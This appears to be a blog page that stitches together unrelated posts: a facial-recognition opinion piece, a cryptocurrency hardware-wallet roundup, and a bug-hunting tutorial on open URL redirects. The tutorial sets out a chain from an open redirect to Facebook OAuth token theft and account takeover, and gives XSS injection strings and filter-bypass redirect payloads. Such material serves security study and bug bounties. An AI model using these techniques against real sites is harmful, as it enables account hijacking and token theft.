Well obviously it looks like a surveillance system, but the technology behind it is being applied in many areas. 
The company behind it has been contracted to apply it's technology to facial recognition within banks, so that people can make transactions, and open accounts using just their face.
The system is also able to read ID cards and compares the image on the card with an image taken by a smartphone camera.  It's not just a straightforward photograph however, it performs 'liveness' detection to ensure that it really is you taking the photo and not just some scammer holding up a photograph to game the system.
It is also being used by China's biggest social network (Weibo) as a photo album feature.

Conclusion

The technology clearly has lot's of potential.  It could look for traffic patterns and adjust the timing of the lights appropriately, or adjust speed limits.  It could automatically detect speeding vehicles or those that jump red lights. 
It could also be used to count the volume of traffic passing through the junction every day.
My personal view is that we need this kind of system in public places, especially given the amount of terrorism that we see these days.  It is physically impossible for the police and intelligence agencies to monitor terrorists and criminals without this sort of technology.
And I guess, if it's only used within public places, then I'm OK with that.  Others may not agree here, as it could be seen as an invasion of privacy. 
The only potential problem that I see is that retailers could use it to spy on your buying habits and potentially sell the data to other companies. 
Facebook especially would be interested in this type of technology (if it hasn't already developed its own version).
What do you guys think?  Are you afraid of this technology and what it could be used for, or all you all for it like myself?  Let me know what you think in the comments.
Cheers!

Read More

Best Cryptocurrency Wallets

Here are the best cryptocurrency wallets to keep your coins safe and secure.

Baz Edwards   Dec 18, 2017

---

Image credit: Zach Copley/Flickr
If you haven't noticed lately, Bitcoin, Ethereum, Litecoin and other alternative digital currencies are growing massively in popularity, largely because of their rapid rise in value, and it seems that everyone wants a piece of the action (including myself!).  And although it's not exactly mainstream technology (yet), I'm pretty sure it will be in the next few years.  More and more people have heard of Bitcoin and its alternatives thanks to news coverage in mainstream media such as the Guardian in the UK and the Washington Post in the US.
Now, as Bitcoin and alternative digital currencies grow in value, the need to be able to store these crypto-currencies safely and securely has never been greater.
There are different ways you can store Bitcoin and other altcoins.  You can store them in desktop wallets (such as the Bitcoin client), mobile wallets that are a bit more useful than desktop wallets as you can pay in crypto for things on the move and online wallets which are web-based wallets that store your private keys online.
You can even make paper wallets, which offer maximum security but paper can obviously degrade and is at risk of being stolen. 
Storing coins in software, desktop or paper wallets is fine, but if you want you wallet to be more secure (why wouldn't you?) then you should use a hardware wallet.

What is a hardware wallet?

A hardware wallet is basically a tamper-proof, physical electronic device that allows you to store private keys, securely in a protected area on the device, and in an offline setting.  So in other words, they're not connected to the Internet.  They kind of behave in a similar way to a paper wallet, which if you're not familiar, is a paper document that contains copies of the public and private keys that make up a wallet.  Hardware wallets are more sophisticated than a paper wallet when it comes to spending and receiving cryptocurrencies.
The main advantage of a hardware wallet is obviously security.  To date, there has not been any major incidents in terms of vulnerabilities or cases where funds have been stolen by hackers (at the time of writing at least).   Even if hackers did manage to get at the keys, they aren't stored in plaintext, so they'd be completely worthless.
The other great thing about hardware wallets is that they can't be attacked by viruses.
Some hardware wallets have security grid cards, and some have a little digital screen so that you can verify transactions.  Even in the case of damage to your hardware wallet, you can restore your cryptocurrency safely and easily with the recovery phrase.
Granted, no-one can guarantee that any method of storage is secure, whether it's software or hardware based, but many Bitcoiners believe there are many significant advantages of using a hardware wallet, and what's more, there's a bunch of these devices to choose from on the market.

Cryptocurrency Hardware Wallets

So if you're thinking of buying Bitcoin and other Cryptocurrency and see them as a long-term investment, then I personally recommend that you order a secure hardware wallet.  If you do decide to get one but not sure which one to go for then keep reading, as I've handpicked the best ones.

Ledger Nano S Cryptocurrency Hardware Wallet

So first up then is the Ledger Nano S Crytocurrency Hardware Wallet - a sleek, compact product from a French startup.
Features include physical buttons that you can use to check and confirm transactions that you can see on the OLED display and there's support for the FIDO Universal Second Factor authentication standard that you will find on Google, Dropbox, GitHub or Dashlane.
The device is battery-less and you simply connect it to a PC or mobile device via USB.  But only you can access the device as you have to enter a 4-digit PIN everytime it is plugged into your computer.
The Ledger Nano S now supports nine cryptocurrencies (including Bitcoin) and also runs dedicated companion applications.  You can use the Ledger Manager to browse through the apps catalogue and also update the firmware so that you can benefit from the latest security features.

---

Trezor bitcoin wallet

The Trezor Bitcoin hardware wallet, created by SatoshiLabs, actually looks like a small calculator but with an OLED screen, so it's pretty minimalistic in design (less things to hack?).  It's also pretty compact, sturdy and uses the latest cryptography standards.
The device can be used to store your bitcoins in a secure way and also protect a variety of alternative digital currencies such as Litecoin, DASH and Zcash.
What's great about this device is that you can also use it with the Trezor Password Manager and sync your encrypted passwords to your private cloud.
Another great feature is that should the device get stolen, lost or damaged, you can easily regain access to all your coins just by restoring a small paper-based backup of the entire Trezor device contents.
Another feature that stands out for me is the fact that Trezor code is open-source which means that any technical decisions are made collectively by the wider developer community.
The Trezor is also really easy to use and is Windows, OS X and Linux friendly.

---

Ledger Nano S - Cryptocurrency Hardware Wallet With MintCell Magnetic USB Cable

The Ledger Nano S with MintCell Magnetic USB Cable is the same device as the Nano S above, so it has support for nine cryptocurrencies has PIN protection and has a paper wallet backup functionality for immediate recovery of your assets in case of loss or destruction of the device.
The only difference with this device is that it comes with a MintCell Magnetic USB cable.  This is a really handy addition to have because it protects the port from dirt, lint, and damage over time with use.  I'm sure you'll agree that there's no point protecting your keys if you're not going to protect your hardware too.  The quick magnetic connection helps with this so there's no fumbling, scratching, or bending.
You can also buy the Ledger Nano S Bitcoin Wallet Bundle With VUVIV Micro-USB Adapter and USB-C Adapter so that you can connect to a variety of laptops and phones including MacBooks! 

---

KeepKey: the Simple Cryptocurrency Hardware Wallet

Keepkey is a hardware wallet manufacturer which is owned by the cryptocurrency startup Shapeshift.
The Keepkey cryptocurrency hardware Wallet is bigger than the Ledger or Trezor and offers an anodized aluminum case which in my opinion makes it look nicer than the others.  It looks pretty futuristic too if you ask me.
Like the other devices I've listed, it offers a micro-USB connection, and a 3.12″ OLED screen display so that you can verify and confirm your transactions.
I guess one unique selling point with the Keepkey is that you can connect with the Shapeshift exchange in a more secure fashion.
Like the others, the Keepkey also stores private keys for multiple cryptocurrencies, and you can even create your own custom firmware on the device as well (if you're so inclined).
Before you buy, see what other people are saying about the KeepKey on Reddit and Amazon

---

Digital Bitbox

The Digital Bitbox hardware wallet is a new product created Shift Devices AG, which is a Swiss-based company.  One thing you'll notice about the Bitbox is that it's smaller and more minimalistic than the other hardware wallets that I've previously listed.
The device connects directly to a computer with a USB connection like the others, but this device actually comes with a recovery micro SD card, which I think is quite a cool feature.
Other features include support for FIDO Universal 2nd Factor (U2F), support for both Android and iOS, but is native only so it avoids the security risks associated with browser extensions.  It is also Tor and Tails OS compatible for additional privacy.
In terms of the actual hardware, the device is portable and durable and has an epoxy-filled case made from the same material used in bullet-proof glass - so pretty robust then!  Also private keys are kept on a high-security chip that prevents physical extraction (with a 50 year lifespan).  Also, it's a single piece of hardware, so no cables or batteries, and no display either (unlike the other devices), though there's less things to go wrong I suppose.
Bear in mind though that at the time of writing the device is a fairly new hardware wallet on the market, and there are only a few reviews online.
But if you're looking for some simple and robust that does the job of keeping your keys safe, then you should definitely consider this wallet. 

Downsides to hardware wallets

So the good thing about hardware wallets is that they're great for keeping your keys safe when you're offline and not connected to the Internet.  But like any product, they're not perfect and there are some drawbacks.
One of the drawbacks to hardware wallets is that should you ever forget or misplace your recovery seed key and/or PIN code, then you won't be able to access your coins.
So basically it's imperative that you remember your PIN code.
It's also a wise idea to write down you backup seed key on a piece of paper and store it somewhere safe.  It's probably also wise to make a few copies and store them in separate places.

Wrapping up

As the popularity in cryptocurrency increases, the demand for hardware wallets also increases.  And for good reason, because these devices can help protect you against bad actors online and they ultimately provide you with the peace of mind that your money is safe.
So in my opinion, they're a reliable and worthy investment, however I'm not sure the same can be said about cryptocurrencies, though I definitely think cryptocurrencies will have a huge part to play in the future.
So whilst this is not an extensive list of devices, they are the best out there at the moment, and who knows, there may more devices to choose from in the future, particularly as cryptocurrencies become more mainstream.
Let me know in the comments what you think about hardware wallets.  Also if you have a hardware wallet yourself already, it would be great if you could share your experiences!

Read More

Url Redirects

---

Open Url Redirects

Open url redirects are simply urls like https://www.example.com/?go=https://www.google.com/, which when visited will go from example.com -> google.com. Generally they are classed as low impact, but can we get account takeover with one?

---

So let's begin on actually finding an open url redirect and common places to look. Let's see what google knows first by using site:example.com inurl:redirect. We can play with that more by using more common words for redirecting such as, inurl:go, inurl:return, inurl:returnTo.

None found? Ok no problem, let's start using their site and look at common places. From my experience common pages are: login, register, logout, change site language, links in emails.

By this time we would of found atleast one open url redirect, and if not, get back to hunting! ;) Now we've got our bug, should we report it or try do something with it? From my experience I will always look further, and I highly suggest you do too! Here are some common things to do with an open url redirect:

— Steal Facebook Oauth tokens via mis-configured facebook app
Facebook do a good job at trying to protect a users' access_token by having features such as the appsecret_proof, but sadly they are let down by people NOT using the features available to them. In walks the hacker. Facebook oauth system is simple: supply it with a client_id and a white listed redirect_uri to obtain the token.

An example: https://www.facebook.com/dialog/oauth?client_id=388795771235143&response_type=token&redirect_uri=https://www.cbssports.com/&scope=email

Note: Either use &response_type=code or response_type=token to achieve different results.

Now let's imagine we have an open url redirect on zseano.cbssports.com. If we input &redirect_uri=https://zseano.cbssports.com/ and it accepts it - BINGO. If not, don't worry, test something like https://www.cbssports.com/test/. If it still does not allow it, they're secure. If it does allow it, the scope can only be http://www.cbssports.com/*.

Now here comes a cool trick with facebooks oauth system. If you supply facebook with &redirect_uri=https://zseano.cbssports.com/?goto=https://www.google.com/ then it won't follow the redirect to your site (where you steal their oauth token).

The trick? URL ENCODE. That's right, if we give facebook &redirect_uri=https%3A%2F%2Fzseano.cbssports.com%2F%3Fgoto%3Dhttps%3A%2F%2Fwww.google.com%2F then it will follow the redirect to your site and you can harvest their fb oauth token. :)

What can a FB oauth token do? lots according to facebook. We can query for their email, post to their wall (if right permissions are given), and tons more. Is our open url redirect starting to mean something because we can harvest their users emails if they visit our site?

— Account takeover with Facebook access_tokens

It doesn't stop at just querying for their facebook information. Get your mobile phone and see if this site has a mobile app. 9 times out of 10 they will have a "Login with Facebook" button and from my experience when logging in (and registering!) via their FB app they will do the following:

- Grab my facebook access_token
- Send it to their server and exchange for a bearer token
- Use this token in all calls (basically my session)

So are you following me here? The apps i've tested essentially allow me to redirect a user to the facebook oauth dialog screen, redirect to my site and hijack his token, then query the actual sites mobile api system in exchange for a token to.. you guessed it, the victims account.

Other common areas to look at are account settings for "connecting" a facebook account.



So, we just turned a "harmless" open url redirect into access to the victims account. Of course all cases of open url redirect are different, but this is a key place I always look (and usually succeed!).

---

What else can be done?

Open Url Redirects can also be used for XSS in a few ways. Let's investigate the case below.



As you can see we firstly have an open url redirect but also a chance to get XSS. What happens if I put ";alert(0);// ? (We use "; to end the var redirectToUrl=""; variable, and then // to comment out the last "; - if not javascript will moan. Using this over the usual script tag will also bypass chromes xss auditor :D)



Yay it worked! :D.

Using the old ?redirect=javascript:alert(0); can sometimes works, especially on SWF files. (site: example.com inurl:?clickTag= ext:swf is a very common one!)

---

Methods for bypassing filters

Every case is different with open url redirects but here are some payloads I use for getting a successful redirect / xss

• java%0d%0ascript%0d%0a:alert(0)
(crlf injection to bypass javascript: being blacklisted)


• //google.com
(incase http:// is blacklisted)


• https:google.com
(browsers accept this, good if // is blacklisted!)


• //google%E3%80%82com
(%E3%80%82 is 。 encoded. A HUGE thanks to filedescriptor for showing me that)


• \/\/google.com/
(useful for bypassing // http:// blacklists. Browsers see \/\/ as //)


• /\/google.com/
(same as above)


• //google.com
(null byte to bypasses blacklist filter. can be used anywhere)


• http://www.theirsite.com@yoursite.com/
(oldie, but browsers will redirect to anything after @)


• http://www.yoursite.com/http://www.theirsite.com/
• (if @ is blacklisted and they check if their domain is in the param, make a folder as their domain :D)
  
  
• ";alert(0);//
(example from above. if the url is echo'd in a variable and we want to get xss in script tag)

..and there we have it. I hope everyone enjoyed the first post and you learnt something new about open url redirects and how to make them useful.

Read More

Live DDoS Attack

Live DDoS Attack Map

Read More